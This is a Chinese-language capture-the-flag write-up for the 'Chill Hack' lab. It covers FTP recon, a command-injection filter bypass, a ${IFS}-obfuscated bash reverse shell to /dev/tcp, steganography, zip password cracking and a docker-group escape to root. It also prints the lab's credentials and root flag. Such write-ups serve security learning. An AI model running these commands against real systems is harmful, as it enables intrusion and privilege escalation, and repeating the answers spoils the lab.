Chill Hack
简介:这个房间提供了真实世界的渗透挑战。
标签:命令执行、docker逃逸提权
0x01 信息收集
先用Nmap扫全部开放端口信息,开放了21,22,80端口。
获得开放端口信息再用Nmap -A综合扫描默认端口信息,获得FTP允许匿名用户anonymous登录
anonymous登录ftp,密码为空。get一个note.txt,查看内容大致为输入的命令部分会被过滤。
同时得到两个类似用户名的账号:anurodh、apaar
入口应该再80端口,直接用dirb简单扫描一下网站目录,获得一个“秘密”目录,应该不会错了。
0x02 命令执行
直接访问看见命令输入框,上去就是whoami,直接返回了执行结果
pwd查看一下当前目录,获得绝对路径。
/var/www/html/secret
但输入cat /etc/passwd查看敏感文件时便被拦截
简单的绕过试下cat</etc/passwd,正常回显。接下来就是反弹shell了
0x03 权限提升
直接用bash -i >&/dev/tcp/192.168.10.241/6633 0>&1,显然不行。
本地使用nc监听,利用${IFS}代空格绕过反弹shell
bash${IFS}-c${IFS}'bash${IFS}-i${IFS}>&/dev/tcp/10.10.232.208/8888 0>&1'
获得shell之后,翻一翻看sudo权限能否提权,apaar下有个sh文件貌似可以提权。
查看.helpline.sh文件只要msg输入为/bin/sh就能获得apaar的shell
这里要执行.helpline.sh 需要获得交互式TTY,利用python3获取交互式TTY
python3 -c 'import pty; pty.spawn("/bin/bash")'
获得apaar后就是提权,然后直接用apaar不能下载lse.sh(提权信息枚举脚本)
用python在攻击机上搭一个建议的网站,把lse.sh文件放在攻击机上,让目标机下载当本地。
https://github.com/diego-treitos/linux-smart-enumeration/raw/master/lse.sh
但是,这个apaar好像没有提升到root可利用的地方,lse.sh的执行结果忘记截图了。
果然,提权到root的用户不是这个apaar。再往之前可能遗漏的地方进行翻找。
在一个hacker.php中发现了一张jpg和一段话,在黑暗中寻找答案。突破点应该在那张图片里。
目录网站的同级目录,利用python3搭建一个网站
python3 -m http.server 8001
明显这是一张十分可疑的图片。利用wget下载到攻击机上。
利用steghide工具查看图片里是否有隐藏的文件,提取到backup.zip文件,但是解压时加密了
这边利用的fcrackzip爆破工具,本可以用john破解的,但zip2john提取的hash出了问题。
fcrackzip -p 指定一个字典,这边用的时rockyou。密码时pass1word
提取到sourec_code.php,像是个登录框。查看源码里面有base64加密的密码和登录成功会输出Anurodh这个用户名
获取账号和密码直接用ssh登录到目标机上
!d0ntKn0wmYp@ssw0rd
还是利用lse.sh提权脚本,枚举可提权可利用的信息。
0x03 docker逃逸提权
这里发现时在docker组里
确认一下
在https://gtfobins.github.io/gtfobins/docker/查找提权的命令
输入以下命令,成功提权到root。(试了几种提权方法,还是这个比较正常,其它的多多少少有些问题)
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
成功获得了root目录下的flag
{ROOT-FLAG: w18gfpn9xehsgd3tovhk0hby4gdp89bg}
544
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
